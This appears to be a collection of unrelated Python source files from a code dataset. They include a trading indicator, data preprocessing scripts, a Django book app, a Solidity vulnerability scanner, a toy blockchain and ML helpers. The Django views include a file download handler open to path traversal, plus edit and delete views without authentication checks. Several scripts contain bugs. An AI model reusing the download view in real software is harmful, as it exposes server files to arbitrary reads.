datapoints.iloc[r]['Close'] < self.maxima[1]):\n self.maxima = datapoints.index[r], datapoints.iloc[r]['Close']\n maxid = r\n if(self.maxima and self.minima):\n 'calculate the fib retracement levels'\n fib_ratios = [0, 0.236, 0.382, 0.5, 0.618, 0.786, 1]\n # fib_ratios.reverse()\n # import pdb; pdb.set_trace()\n self.retracement_levels = [self.minima[1]+(\n self.maxima[1]-self.minima[1])*ratio for ratio in fib_ratios]\n\n def get_retracement_level(self):\n if(self.retracement_levels):\n return np.digitize(self.ohlcs.iloc[-1]['Close'], self.retracement_levels)\n\n def get_sr(self, offset=0):\n sup = res = None\n if(self.psup):\n sup = self.psup(offset)\n if(self.pres):\n res = self.pres(offset)\n return (sup, res)\n\n def update_supres(self):\n s, r = self.get_sr(self.n_since_calc)\n if(s):\n # self.psup = np.poly1d(\n # [self.psup.c[0], self.psup.c[1] + self.psup.c[0]*self.n_since_calc])\n # s = self.psup[0]\n self.shistory.append(\n (self.ohlcs.index[-1], dict(value=s, slope=self.psup.c[0])))\n print(datetime.datetime.time(\n self.shistory[-1][0]), 'support:', self.shistory[-1][1])\n if(r):\n # self.pres = np.poly1d(\n # [self.pres.c[0], self.pres.c[1] + self.pres.c[0]*self.n_since_calc])\n # r = self.pres(0)\n self.rhistory.append(\n (self.ohlcs.index[-1], dict(value=r, slope=self.pres.c[0])))\n print(datetime.datetime.time(\n self.rhistory[-1][0]), 'resistance:', 
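# --- aside: the retracement arithmetic above, isolated. Levels step from the
# swing high toward the swing low by the Fibonacci ratios, and np.digitize
# (which accepts monotonically decreasing bins) then maps a price to the band
# it falls in:
import numpy as np

def fib_levels(high, low):
    ratios = [0, 0.236, 0.382, 0.5, 0.618, 0.786, 1]
    return [high - (high - low) * r for r in ratios]

levels = fib_levels(110.0, 100.0)
print(levels)                      # 110.0 ... 100.0, descending
print(np.digitize(104.0, levels))  # index of the band holding 104.0
# --- end aside ---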
self.rhistory[-1][1])\n\n def calc(self):\n 'minimum number of candlesticks required'\n if(self.ohlcs is None):\n return\n length = len(self.ohlcs)\n acc = int(getConfig('ACCURACY'))\n if(length < (acc+acc/2+1)):\n return\n else:\n self.calc_trendln()\n\n def on_data(self, data):\n 'data will come on every candle update'\n self.last_price = data['last_price']\n self.timestamp = data['timestamp']\n self.ohlcs = data['ohlcs']\n self.token = data['token']\n self.n_since_calc += 1\n if(self.n_since_calc == 0):\n self.calc()\n else:\n if(self.n_since_calc >= self.n_recalc_period):\n self.calc()\n self.n_since_calc = 0\n else:\n print('n_since_calc:',\n f'{self.n_since_calc}/{self.n_recalc_period}')\n 'shift psup/res'\n self.update_supres()\n\n # for cb in self.cbs:\n # cb()\n","sub_path":"libs/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541065290","text":"# Experiment 1: shuffle the data before splitting into train/val/test. This file first segments all recordings, then splits train/val/test across the whole dataset instead of within a single recording.\r\nimport os\r\nimport pickle\r\nimport json\r\nimport math\r\nimport numpy as np\r\nimport random\r\n\r\n\r\nDatadir = '../../data/'\r\nout_path = '../../input/M2D_segment_frames/'\r\n\r\nmin_duration = 229\r\nmin_num = 34\r\nnum_joint = 23\r\nmax_body = 1\r\n\r\nfrom m2d_pre import pre_normalization\r\nfrom sklearn import preprocessing\r\nfrom m2d_gen import motion_feature_extract\r\nfrom sklearn.utils import shuffle\r\n\r\n# Two issues when reading these skeleton json files: whether rotation and de-centering are needed; each json file has a different frame count (frames * 23 * 3), which has one dimension (the person dimension) fewer than the 2sgcn network input, and the number of frames is not fixed.\r\n# takes an array of file names and produces the data arrays\r\ndef genda(data_dirs):\r\n data = np.zeros((min_num, 3, min_duration, num_joint, max_body), dtype=np.float32)\r\n data_dir = []\r\n data_num = 0\r\n for i, one in enumerate(data_dirs):\r\n if data_num >= min_num:\r\n break\r\n\r\n data_path = os.path.join(Datadir, one)\r\n\r\n motion_features_pre = motion_feature_extract(data_path, with_centering=True, with_rotate=False)\r\n # normalization: min-max normalize every sample individually\r\n motion_features = motion_features_pre.reshape(motion_features_pre.shape[0], -1)\r\n min_max_scaler = preprocessing.MinMaxScaler().fit_transform(motion_features)\r\n motion_features = min_max_scaler.reshape(min_max_scaler.shape[0], 23, 3)\r\n\r\n t = motion_features.shape[0] // min_duration\r\n\r\n for j in range(t):\r\n if data_num >= min_num:\r\n break\r\n else:\r\n temp_features = motion_features[min_duration * j:min_duration * (j + 1), :, :]\r\n temp_features = np.expand_dims(temp_features, 3)\r\n temp_features = np.transpose(temp_features, [2, 0, 1, 3])\r\n\r\n data[data_num, :, :, :, :] = temp_features\r\n data_num += 1\r\n data_dir.append(one)\r\n\r\n data = pre_normalization(data)\r\n\r\n return data,data_dir\r\n\r\n\r\nif __name__ == '__main__':\r\n All_dirs = os.listdir(Datadir)\r\n All_dirs.sort()\r\n C_dirs = []\r\n R_dirs = []\r\n T_dirs = []\r\n W_dirs = []\r\n for one in All_dirs:\r\n if one[0] != 'D':\r\n continue\r\n if one.split('_')[1] == 'C':\r\n C_dirs.append(one)\r\n elif one.split('_')[1] == 'R':\r\n R_dirs.append(one)\r\n elif one.split('_')[1] == 'T':\r\n T_dirs.append(one)\r\n else:\r\n W_dirs.append(one)\r\n C_data,C_dir = genda(C_dirs)\r\n R_data,R_dir = genda(R_dirs)\r\n T_data,T_dir = genda(T_dirs)\r\n W_data,W_dir = genda(W_dirs)\r\n data_dir = C_dir + R_dir + T_dir + W_dir\r\n data = np.vstack((C_data, R_data, T_data, W_data))\r\n\r\n seg = min_num\r\n\r\n label = [0] * seg + [1] * seg + [2] * seg + [3] * seg\r\n data,label,data_dir = shuffle(data,label,data_dir,random_state = 0)\r\n s = 
len(label) // 3\r\n train,train_label,train_dir = data[:s],label[:s],data_dir[:s]\r\n val,val_label,val_dir = data[s:s*2],label[s:s*2],data_dir[s:s*2]\r\n test,test_label,test_dir = data[s*2:],label[s*2:],data_dir[s*2:]\r\n\r\n np.save('{}/{}_joint.npy'.format(out_path, 'train'), train)\r\n np.save('{}/{}_joint.npy'.format(out_path, 'val'), val)\r\n np.save('{}/{}_joint.npy'.format(out_path, 'test'), test)\r\n\r\n with open('{}/{}_label.pkl'.format(out_path, 'train'), 'wb') as f:\r\n pickle.dump((train_dir, list(train_label)), f) # save the file names and the corresponding abbreviations (as labels) into a pkl file.\r\n with open('{}/{}_label.pkl'.format(out_path, 'val'), 'wb') as f:\r\n pickle.dump((val_dir, list(val_label)), f) # save the file names and the corresponding abbreviations (as labels) into a pkl file.\r\n with open('{}/{}_label.pkl'.format(out_path, 'test'), 'wb') as f:\r\n pickle.dump((test_dir, list(test_label)), f) # save the file names and the corresponding abbreviations (as labels) into a pkl file.","sub_path":"hmmr/data_gen/m2d_random.py","file_name":"m2d_random.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"35519067","text":"import random\r\n\r\nclass Deck():\r\n \"\"\"A class representing a standard deck of 52 cards.\r\n Public methods: __init__, shuffle, make_hand,\r\n show_top_card\r\n \"\"\"\r\n\r\n # Annotate object-level fields\r\n _hands: dict\r\n _stock: list\r\n\r\n def _get_card_name(self, card: int) -> str:\r\n \"\"\"Convert the card to a string representation.\"\"\"\r\n suits: list = [\"hearts\", \"clubs\", \"diamonds\", \"spades\"]\r\n ranks: list = [\"ace\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\",\r\n \"eight\", \"nine\", \"ten\", \"jack\", \"queen\", \"king\"]\r\n return ranks[card % 13] + \" of \" + suits[card // 13]\r\n\r\n def __init__(self) -> None:\r\n \"\"\"Create a standard 52-card deck.\"\"\"\r\n self._hands = {}\r\n self._stock = list(range(52))\r\n\r\n def shuffle(self) -> None:\r\n \"\"\"Shuffle the stock.\"\"\"\r\n random.shuffle(self._stock)\r\n\r\n def make_hand(self, size: int) -> int:\r\n \"\"\"Create a hand of size cards and return a key.\"\"\"\r\n key: int = len(self._hands)\r\n hand: list = []\r\n for i in range(size):\r\n # always deal from the top of the stock\r\n hand.append(self._stock[0])\r\n self._stock = self._stock[1:]\r\n self._hands[key] = hand\r\n return key\r\n\r\n def show_top_card(self, key: int = -1) -> str:\r\n \"\"\"Return a string representing the top card of the hand with key.\"\"\"\r\n hand: str\r\n if key != -1:\r\n hand = self._get_card_name(self._hands[key][0])\r\n else:\r\n hand = self._get_card_name(self._stock[0])\r\n return hand\r\n \r\n","sub_path":"Chapter3VideoFiles/Deck.py","file_name":"Deck.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"45207417","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse, Http404\nfrom django.conf import settings\nfrom .models import *\nfrom .forms import *\nimport os\n\n\ndef index(request):\n books = Book.objects.all()\n context = {'file': Book.objects.all(), 'books': books}\n return render(request, 'index.html', context)\n\n\ndef add(request):\n if request.user.is_authenticated:\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = BookForm(request.POST or None, request.FILES)\n if form.is_valid():\n data = form.save(commit=False)\n data.save()\n return redirect('index')\n else:\n form = BookForm()\n\n context = {'form': form}\n return render(request, 'add.html', context)\n\n else:\n return 
redirect('index')\n\n return redirect('login')\n\n\ndef detail(request, id):\n book = Book.objects.get(id=id)\n return render(request, 'book_detail.html', {'book': book})\n\n\ndef edit(request, id):\n book = Book.objects.get(id=id)\n if request.method == 'POST':\n form = BookForm(request.POST or None, instance=book)\n if form.is_valid():\n data = form.save(commit=False)\n data.save()\n return redirect('detail', id)\n else:\n form = BookForm(instance=book)\n\n return render(request, 'update.html', {'book': book, 'form': form})\n\n\ndef delete(request, id):\n book = Book.objects.get(id=id)\n if request.method == 'POST':\n book.delete()\n return redirect('index')\n\n return render(request, 'delete.html', {'book': book})\n\n\ndef download(request, path):\n file_path = os.path.join(settings.MEDIA_ROOT, path)\n if os.path.exists(file_path):\n with open(file_path, 'rb') as fh:\n response = HttpResponse(\n fh.read(), content_type='application/upload_file')\n response['Content-Disposition'] = 'inline;filename=' + \\\n os.path.basename(file_path)\n return response\n\n raise Http404\n","sub_path":"book_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"585946634","text":"\"\"\"\n **** detect solidity source code roughly ****\n run this script to analyze source files roughly\n see the output in logs/detectroughly.log\n and the faulty source files will be stored in the 'tempFaultSol' directory\n @ author : liuwang\n @ school : Wuhan University\n @ date : 2018.11.8\n\"\"\"\n\nimport re\nimport os\nimport shutil\nfrom Tools.utils import getDirOrFileName\nimport logging\n# config log file\n\nlogging.basicConfig(level=logging.INFO, filename='./logs/detectroughly.log',\n format = '%(asctime)s - %(levelname)s - %(message)s',\n filemode='a', datefmt='%Y-%m-%d %I:%M:%S %p')\n# print msg in console and log file\ndef doLogging(msg):\n print(msg)\n logging.info(msg)\n\nSOURCECODE_DIR = './contractdata/sourcecode'\n# SOURCECODE_DIR = './contracttest/sourcecode'\n\nOUTPUT_DIR_DoSAttack = './tempFaultSol/DoSAttack'\nOUTPUT_DIR_UexpectedEther = './tempFaultSol/UexpectedEther'\nOUTPUT_DIR_ImproperAccessControl = './tempFaultSol/ImproperAccessControl'\ndef __checkDirAndCreate(path):\n if not os.path.exists(path):\n os.makedirs(path)\n doLogging('create directory {}'.format(path))\nOUTPUT_DIRS = [OUTPUT_DIR_DoSAttack, OUTPUT_DIR_UexpectedEther, OUTPUT_DIR_ImproperAccessControl]\nfor dir in OUTPUT_DIRS:\n __checkDirAndCreate(dir)\n\n# detect call in for-loop, return 'true' if code has a for loop with a checked call\ndef __detectForLoapWithCall(sourceCode):\n pattern = re.compile(r'(for[ ]*?\\([^\\{]*?\\{[^\\}]*?(?:\\.transfer|(?:require|assert)\\([^\\)]*?(?:\\.send|\\.call\\..*?))\\(.*?\\})', re.S)\n faults = re.findall(pattern, sourceCode)\n for fault in faults:\n doLogging('Code here may be Error:\\n\\t' + fault)\n return len(faults) > 0\n\n# detect strict balance checks, return 'true' if code compares the contract balance with ==, > or <\ndef __detectUexpectedEther(sourceCode):\n pattern = re.compile(r'((?:(?:require|assert|if)\\([^\\)]*?(?:this\\.|address\\(this\\)\\.)balance[^\\)]*?[><=]{1,}[^\\)]*?\\)|'\n r'(?:require|assert|if)\\([^\\)]*?[><=]{1,}[^\\)]*?(?:this\\.|address\\(this\\)\\.)balance.*?\\)))', re.S)\n faults = re.findall(pattern, sourceCode)\n for fault in faults:\n doLogging('Code here may be Error:\\n\\t' + fault)\n return len(faults) > 0\n\ndef 
detectAllForLoapWithCall():\n doLogging('detectAllForLoapWithCall begin ......======================================')\n sols = getDirOrFileName(SOURCECODE_DIR)\n faultFiles = []\n print(len(sols))\n for filename in sols:\n try:\n with open(os.path.join(SOURCECODE_DIR, filename), encoding='utf-8') as file:\n sourcecode = file.read()\n if __detectForLoapWithCall(sourcecode):\n faultFiles.append(filename)\n doLogging(filename)\n except Exception:\n pass\n doLogging('detectAllForLoapWithCall finish !!!!!======================================')\n for filename in faultFiles:\n shutil.copyfile(os.path.join(SOURCECODE_DIR, filename),\n os.path.join(OUTPUT_DIR_DoSAttack, filename))\n return faultFiles\n\ndef detectAllUexpectedEther():\n doLogging('detectAllUexpectedEther begin ......======================================')\n sols = getDirOrFileName(SOURCECODE_DIR)\n faultFiles = []\n print(len(sols))\n for filename in sols:\n try:\n with open(os.path.join(SOURCECODE_DIR, filename), encoding='utf-8') as file:\n sourcecode = file.read()\n if __detectUexpectedEther(sourcecode):\n faultFiles.append(filename)\n doLogging(filename)\n except Exception:\n pass\n doLogging('detectAllUexpectedEther finish !!!!!======================================')\n for filename in faultFiles:\n shutil.copyfile(os.path.join(SOURCECODE_DIR, filename),\n os.path.join(OUTPUT_DIR_UexpectedEther, filename))\n return faultFiles\n\n\nif __name__ == '__main__':\n doLogging(detectAllForLoapWithCall())\n doLogging(detectAllUexpectedEther())","sub_path":"Tools/detectroughly.py","file_name":"detectroughly.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"211111244","text":"import hashlib\nimport time\nimport unittest\n\nclass Block:\n\n def __init__(self, data, previous_hash = None):\n self.timestamp = self.calc_timestamp()\n self.data = data\n self.next = None\n self.previous_hash = previous_hash\n self.hash = self.calc_hash(data) + self.timestamp\n \n def calc_hash(self, input_string):\n \n sha = hashlib.sha256()\n hash_str = input_string.encode('utf-8')\n sha.update(hash_str)\n\n return sha.hexdigest()\n \n def calc_timestamp(self):\n \n \"\"\" return string representation of gmt time \"\"\"\n\n time_gmt = ''.join(str(i) for i in time.gmtime())\n return time_gmt\n \n\nclass BlockChain:\n \n def __init__(self, head=None, tail=None):\n self.head = head\n self.tail = tail\n self.previous_hash_data = None\n self.size = 0\n \n def append(self, data):\n \n # check for valid input\n if not data:\n raise ValueError('must input data into the blockchain')\n # empty blockchain case\n if self.head is None:\n # force data to string\n data = str(data)\n self.head = Block(data)\n self.tail = self.head\n self.previous_hash_data = self.head.hash\n self.size += 1\n return\n else:\n # force data to string\n data = str(data)\n new_block = Block(data) \n new_block.previous_hash = self.previous_hash_data\n self.previous_hash_data = new_block.hash\n new_block.next = self.head\n self.head = new_block\n self.size += 1\n return\n \n \n def return_size(self):\n\n \"\"\" return the size of the blockchain \"\"\"\n\n return self.size\n \n def data_to_list(self):\n \n out = []\n block = self.head\n while block:\n out.append(block.data)\n block = block.next\n \n return out \n \n \n def to_dict(self):\n \n \"\"\" create a dictionary of the blockchain for viewing \"\"\"\n \n out = {}\n block = self.head\n while block:\n \n out[block.data] = {\n 
'TimeStamp':block.timestamp,\n 'Hash':block.hash,\n 'Previous Block Hash':block.previous_hash}\n block = block.next\n return out\n\n \n \n#Instantiate the blockchain and append for testing \ntest_blockchain = BlockChain()\nblock_test_range = ['a','b','c','d']\nfor i in block_test_range:\n test_blockchain.append(i)\n \n#create dictionary for testing\ntest_blockchain_dict = test_blockchain.to_dict()\n\n\n\n\nclass TestBlockChain(unittest.TestCase):\n \n \"\"\" test blockchain suite \"\"\"\n \n def test_previous_hashing(self):\n \n \"\"\" assert hashing function works correctly \"\"\"\n \n assert (test_blockchain_dict['a']['Hash']) == \\\n (test_blockchain_dict['b']['Previous Block Hash'])\n assert (test_blockchain_dict['b']['Hash']) == \\\n (test_blockchain_dict['c']['Previous Block Hash'])\n assert (test_blockchain_dict['c']['Hash']) == \\\n (test_blockchain_dict['d']['Previous Block Hash'])\n \n def test_input_error(self):\n # chain should raise a ValueError when given no input \n with self.assertRaises(ValueError):\n test_blockchain.append('') \n \n def test_int_input(self):\n # shouldn't throw an error\n test_blockchain.append(5)\n \n#run tests\nunittest.main(argv=['first-arg-is-ignored'], exit=False)","sub_path":"data_structures/BlockChain/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"568226320","text":"#!/usr/bin/env python\n__author__ = \"etseng@pacb.com\"\n\n\"\"\"\nDemultiplex IsoSeq (SMRT Link 8.0) job output (with genome mapping)\n\"\"\"\n\nimport re\nimport sys\nfrom collections import Counter, defaultdict\nfrom csv import DictReader\nfrom pathlib import Path\nfrom typing import Dict, Optional, Set, Tuple\n\nimport typer\nfrom Bio import SeqIO\n\nfrom cupcake import version_callback\nfrom cupcake import cupcake_logger as logger\n\nmapped_id_rex = re.compile(r\"(PB\\.\\d+\\.\\d+)\")\n\n\napp = typer.Typer(name=\"cupcake.post_isoseq_cluster.demux_isoseq_with_genome\")\n\n\ndef type_fafq(fafq: str) -> str:\n x = fafq.upper()\n if x.endswith(\".FA\") or x.endswith(\".FASTA\"):\n return \"fasta\"\n elif x.endswith(\".FQ\") or x.endswith(\".FASTQ\"):\n return \"fastq\"\n else:\n raise Exception(\n f\"Mapped fasta/fastq filename must end with .fasta or .fastq! 
Saw {fafq} instead, abort!\"\n )\n\n\ndef link_files(src_dir: str, out_dir=Path.cwd()) -> Tuple[Path, Path, Path, Path]:\n \"\"\"\n :param src_dir: job directory\n Locate mapped.fastq, read-stat, classify report link to current directory\n \"\"\"\n\n src_dir = Path(src_dir)\n # location for mapped fastq in IsoSeq3\n mapped_fastq = src_dir.joinpath(\"outputs\", \"collapse_isoforms.fastq\")\n # assumed locations for the read-stat and classify report next to the mapped fastq;\n # adjust these paths if the job directory layout differs\n read_stat = src_dir.joinpath(\"outputs\", \"collapse_isoforms.read_stat.txt\")\n classify_csv = src_dir.joinpath(\"outputs\", \"flnc.report.csv\")\n return out_dir, mapped_fastq, read_stat, classify_csv\n\n\ndef read_read_stat(read_stat: Path, classify_info: Dict[str, str]) -> Dict[str, Counter]:\n \"\"\"\n :return: dict of pbid --> (int) primer --> FL count\n \"\"\"\n info = defaultdict(lambda: Counter())\n for r in DictReader(open(read_stat), delimiter=\"\\t\"):\n p = classify_info[r[\"id\"]]\n info[r[\"pbid\"]][p] += 1\n return dict(info)\n\n\ndef read_classify_csv(classify_csv: Path) -> Tuple[Set[str], Dict[str, str]]:\n \"\"\"\n :param classify_csv: classify report csv\n :return: primer list, dict of FL id --> primer\n \"\"\"\n info = {}\n primer_list = set()\n for r in DictReader(open(classify_csv), delimiter=\",\"):\n p = r[\"primer\"]\n primer_list.add(p)\n if r[\"id\"] in info:\n raise Exception(f\"{r['id']} listed more than once in {classify_csv}!\")\n info[r[\"id\"]] = p\n return primer_list, info\n\n\ndef demux_isoseq_with_genome(\n job_dir: Optional[str] = None,\n mapped_fafq: Optional[str] = None,\n read_stat: Optional[str] = None,\n classify_csv: Optional[str] = None,\n output_filename=sys.stdout,\n primer_names: Optional[str] = None,\n) -> None:\n if job_dir is not None:\n _, mapped_fafq, read_stat, classify_csv = link_files(job_dir)\n else:\n mapped_fafq = Path(mapped_fafq)\n read_stat = Path(read_stat)\n classify_csv = Path(classify_csv)\n for _ in (mapped_fafq, read_stat, classify_csv):\n if not _.exists():\n raise FileNotFoundError(f\"Cannot find {_.name}\")\n\n # info: dict of hq_isoform --> primer --> FL count\n logger.info(f\"Reading {classify_csv}...\")\n primer_list, classify_info = read_classify_csv(classify_csv)\n logger.info(f\"Reading {read_stat}...\")\n info = read_read_stat(read_stat, classify_info)\n\n primer_list = list(primer_list)\n primer_list.sort()\n # if primer names are not given, just use as is...\n tmp_primer_names = {x: x for x in primer_list}\n if primer_names is None:\n primer_names = tmp_primer_names\n else:\n for k, v in tmp_primer_names.items():\n if k not in primer_names:\n primer_names[k] = v\n\n with open(output_filename, \"w\") as f:\n f.write(f\"id,{','.join(list(primer_names.values()))}\\n\")\n logger.info(f\"Reading {mapped_fafq}....\")\n for r in SeqIO.parse(open(mapped_fafq), type_fafq(mapped_fafq)):\n m = mapped_id_rex.match(r.id) # expected ID: PB.X.Y|xxxx.....\n if m is None:\n raise Exception(f\"Expected ID format PB.X.Y but found {r.id}!\")\n pbid = m.group(1)\n f.write(pbid)\n for p in primer_names:\n f.write(f\",{info[pbid][p]}\")\n f.write(\"\\n\")\n logger.info(f\"Count file written to {f.name}.\")\n\n\n@app.command(name=\"\")\ndef main(\n job_dir: str = typer.Option(\n ...,\n \"--job_dir\",\n \"-j\",\n help=\"Job directory (if given, automatically finds required files)\",\n ),\n mapped_fafq: str = typer.Option(\n ..., help=\"mapped fasta/fastq (overridden by --job_dir if given)\"\n ),\n read_stat: str = typer.Option(\n ..., help=\"read_stat txt (overridden by --job_dir if given)\"\n ),\n classify_csv: str = typer.Option(\n ..., help=\"Classify report CSV (overridden by --job_dir if given)\"\n ),\n primer_names: Optional[str] = typer.Option(\n None,\n help=\"Text file showing primer sample names (default: None)\",\n ),\n output: str = typer.Option(..., \"--output\", \"-o\", help=\"Output count filename\"),\n version: bool = typer.Option(\n None,\n 
\"--version\",\n callback=version_callback,\n is_eager=True,\n help=\"Prints the version of the SQANTI3 package.\",\n ),\n):\n if primer_names is not None:\n primer_names = {}\n for line in open(primer_names):\n index, name = line.strip().split()\n primer_names[index] = name\n else:\n primer_names = None\n\n demux_isoseq_with_genome(\n job_dir,\n mapped_fafq,\n read_stat,\n classify_csv,\n output,\n primer_names,\n )\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","sub_path":"src/cupcake/post_isoseq_cluster/demux_isoseq_with_genome.py","file_name":"demux_isoseq_with_genome.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"489254929","text":"import numpy as np\nimport pandas as pd\n\ndef normalizacionColumna(df, i):\n columns = df.columns.values\n df[columns[i]] = (df[columns[i]] - data[columns[i]].min()) / (df[columns[i]].max() - data[columns[i]].min())\n \ndef normalizarDataset(data, indices):\n df = data.copy()\n for i in indices:\n normalizacionColumna(df, i)\n return df\n\ndef mapearColumna(df, col):\n val = []\n for j in range(df.shape[0]):\n val.append(df[col][j])\n unicos = list(set(val))\n for j in range(df.shape[0]):\n indice = 0\n for _ in range(len(unicos)):\n if(unicos[_] == df[col][j]):\n indice = _ + 1\n break\n val[j] = indice\n return val\n\ndef mapearColumnas(data, indices):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n df[columns[i]] = mapearColumna(df, columns[i])\n return df\n\ndef normalizarfechas(data, indices, ini, fin):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n a = []\n for j in range(data.shape[0]):\n st = df[columns[i]][j][:ini]\n if(fin != 0):\n st+= df[columns[i]][j][-fin:]\n a.append(st)\n df[columns[i]] = a\n return df\n\ndef weightedAverage(data, w, l):\n df = data.copy()\n columns = df.columns.values\n wa = np.zeros(df.shape[0])\n for i in range(len(l)):\n wa += (w[i] * df[columns[l[i]]]) / sum(w)\n df['wa'] = wa\n # df = df.sort_values(by=['wa'], ascending=False)\n return df\n\ndef minimax(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n mx = np.zeros(df.shape[0])\n for i in range(t):\n mx[i] = df[columns[l[0]]][i]\n for j in range(1,len(l)):\n if mx[i] > df[columns[l[j]]][i]: \n mx[i] = df[columns[l[j]]][i]\n df['maxVal'] = mx\n df = df.sort_values(by=['maxVal'], ascending=True)\n return df\n\ndef leximin(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n lex = [np.zeros(df.shape[0]) for i in range(len(l))]\n a = [[] for i in range(len(l))]\n for i in range(t):\n for j in range(len(l)):\n a[j] = df[columns[l[j]]][i]\n a.sort()\n for j in range(len(l)):\n lex[j][i] = a[j]\n for j in range(len(l)):\n df['c' + str(j)] = lex[j]\n c = ['c' + str(i) for i in range(len(l))]\n df = df.sort_values(by=c, ascending=False)\n return df\n\ndef maximin(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n mn = np.zeros(df.shape[0])\n for i in range(t):\n mn[i] = df[columns[l[0]]][i]\n for j in range(1,len(l)):\n if mn[i] > df[columns[l[j]]][i]: \n mn[i] = df[columns[l[j]]][i]\n df['minVal'] = mn\n df = df.sort_values(by=['minVal'], ascending=False)\n return df\n\ndef leximax(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n lex = [np.zeros(df.shape[0]) for i in range(len(l))]\n a = [[] for i in range(len(l))]\n for i in range(t):\n for j in range(len(l)):\n a[j] = df[columns[l[j]]][i]\n 
a.sort(reverse=True)\n for j in range(len(l)):\n lex[j][i] = a[j]\n for j in range(len(l)):\n df['c' + str(j)] = lex[j]\n c = ['c' + str(i) for i in range(len(l))]\n df = df.sort_values(by=c, ascending=False)\n return df\n\ndef ParetoDomina(a,b):\n mi = len([1 for i in range(len(a)) if a[i] >= b[i]])\n my = len([1 for i in range(len(a)) if a[i] > b[i]])\n if mi == len(a):\n if my > 0:\n return True\n return False\n\ndef skylines(data, l):\n df = data.copy()\n columns = df.columns.values\n t = df.shape[0]\n for i in range(t):\n if i in df.index:\n a = [0] * len(l)\n for j in range(i + 1, t):\n if j in df.index:\n b = [0] * len(l)\n for k in range(len(l)):\n a[k] = df[columns[l[k]]][i]\n b[k] = df[columns[l[k]]][j]\n if ParetoDomina(a,b):\n df = df.drop(j)\n elif ParetoDomina(b,a):\n df = df.drop(i)\n break\n return df\n\ndef distancia_n(a, n, b, base): \n s = 0\n for i in range(n):\n s+= abs(b[i] - a[i])**base\n s = s**(1/base)\n return s\n\nimport random\ndef npoint(col, l, df):\n a = []\n for indice in l:\n a.append(random.uniform(df[col[indice]].min(),df[col[indice]].max()))\n return a\n\ndef ig(A, B):\n # compare the clusterings pairwise: they are equal only if every group matches\n for a_, b_ in zip(A, B):\n if(len(a_) != len(b_)):\n return False\n for i in range(len(a_)):\n if(a_[i] != b_[i]):\n return False\n return True\n\ndef kmeans(data, l, k, it, base):\n df = data.copy()\n t = df.shape[0]\n c = df.shape[1]\n columns = df.columns.values\n centros = []\n for i in range(k):\n centros.append(npoint(columns, l, df))\n \n G = [[] for i in range(k)]\n GANT = [[] for i in range(k)]\n etiqueta = [-1]*t\n iteraciones = it\n while(iteraciones > 0):\n iteraciones-=1\n for i in range(t):\n aux_ = [0]*len(l)\n for j in range(len(l)):\n aux_[j] = df[columns[l[j]]][i]\n mn = distancia_n(aux_, len(l), centros[0], base)\n idm = 0\n for k_ in range(1,k):\n ds = distancia_n(aux_ , len(l), centros[k_], base)\n if(ds < mn):\n mn = ds\n idm = k_\n G[idm].append(i)\n if(ig(GANT,G)):\n break\n GANT = G\n for k_ in range(k):\n for j in range(len(l)):\n centros[k_][j] = 0\n for elem in G[k_]:\n centros[k_][j]+= df[columns[l[j]]][elem]\n etiqueta[elem] = k_ + 1\n if(len(G[k_])):\n centros[k_][j]/=len(G[k_])\n \n G = [[] for i in range(k)]\n \n df['tipo'] = etiqueta\n return df\n\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\ndef pca(data, l, com):\n c_ = data.shape[1]\n used = [0]*c_\n otros = [] \n col_com = [None]*com\n for i in range(com):\n col_com[i] = \"principal_component_\" + str(i + 1)\n columns = data.columns.values\n col = [0]*len(l)\n for i in range(len(l)):\n col[i] = columns[l[i]]\n used[l[i]] = 1\n \n for i in range(c_):\n if(not used[i]):\n otros.append(columns[i])\n \n df = pd.DataFrame(data, columns = col) \n df_otro = pd.DataFrame(data, columns = otros)\n df = StandardScaler().fit_transform(df)\n pca = PCA(n_components = com)\n pc = pca.fit_transform(df)\n pdf = pd.DataFrame(data = pc, columns = col_com)\n \n return pd.concat([df_otro, pdf], axis = 1), pca.explained_variance_ratio_*100\n\n\ndef clase(k, indice, df, l, col, t, idc, nclases):\n a = [0]*len(l)\n distancias = []\n for j in range(len(l)):\n a[j] = df[col[l[j]]][indice]\n \n for i in range(t):\n b = [0]*len(l)\n for j in range(len(l)):\n b[j] = df[col[l[j]]][i]\n distancias.append((distancia_n(a, len(l), b, 2), i))\n distancias.sort()\n cont = [0]*nclases\n for i in range(k):\n cont[df[col[idc]][distancias[i][1]] - 1]+=1\n \n nueva = 1\n mayor = 0\n for i in range(nclases):\n if(cont[i] > mayor):\n mayor = cont[i]\n nueva = i + 1\n \n return nueva\n\ndef knn(data, l, k, idc):\n 
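# naive k-nearest-neighbours over the whole frame: label every row with the\n # majority class (column idc) among its k closest rows, using Euclidean distance\n # over the feature columns in l, and collect per-class counts for plotting\n 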
